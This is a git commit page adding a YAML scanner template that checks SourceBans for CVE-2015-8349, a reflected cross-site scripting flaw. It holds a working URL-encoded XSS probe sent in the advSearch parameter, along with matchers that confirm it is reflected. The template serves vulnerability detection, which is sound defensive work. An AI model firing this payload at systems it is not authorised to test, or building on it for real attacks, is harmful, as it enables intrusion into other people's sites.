Create CVE-2015-8349.yaml
parent
7d200d7028
commit
e3af07706d
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2015-8349
|
||||
|
||||
info:
|
||||
name: SourceBans XSS
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349
|
||||
tags: cve,cve2015,xss,sourcebans
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3Cimg%2Bsrc%3Dx%2Bonerror%3Dalert%28document.domain%29%3E&advType=btype"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<img+src=x+onerror=alert(document.domain)>'
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/
|
Loading…
Reference in New Issue